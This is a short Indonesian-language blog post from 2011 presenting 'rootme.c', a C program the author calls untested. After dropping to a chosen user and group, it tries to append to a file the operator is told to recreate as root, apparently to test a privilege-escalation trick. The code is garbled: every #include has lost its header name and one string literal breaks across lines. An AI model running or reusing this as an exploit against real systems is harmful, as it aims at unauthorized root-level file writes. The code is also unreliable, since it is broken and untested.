Pages

15 March 2011

rootme.c <= untested (masih ngantuk coyyyyy)

#include 
#include 
#include 
#include 
#include 

int main(int argc, char *argv[]) {

 if (argc < 4) {
  fprintf(stderr, "%s:   \n", argv[0]);
  exit(1);
 }

 {
  char *user = argv[1];
  char *group = argv[2];
  char *file = argv[3];
  char buf[200];

  stdout = freopen(file, "a", stdout);

  /* set gid if necessary */
  if (group) {
   struct group *gr;

   if ((gr = getgrnam(group)) == NULL) {
    fprintf(stderr, "no such group %s - aborted", group);
    exit(1);
   }

   if (setgid(gr->gr_gid) || setegid(gr->gr_gid)) {
    fprintf(stderr, "setgid: %s - aborted", strerror(errno));
    exit(1);
   }
  }

  /* set uid if necessary */
  if (user) {
   struct passwd *pw;

   if ((pw = getpwnam(user)) == NULL) {
    fprintf(stderr, "no such user %s - aborted", user);
    exit(1);
   }
   if (setuid(pw->pw_uid) || seteuid(pw->pw_uid)) {
    fprintf(stderr, "setuid: %s - aborted", strerror(errno));
    exit(1);
   }
  }

  fprintf(stderr, "now go erase the file '%s', 

  recreate it as root:root and press enter\n", file);
  fgets(buf, sizeof(buf), stdin);

  stdout = freopen(file, "a", stdout);
  if (stdout == NULL) {
   perror("freopen");
  }
  fprintf(stdout, "jama\n");

  exit(0);
 }
}

0 comments: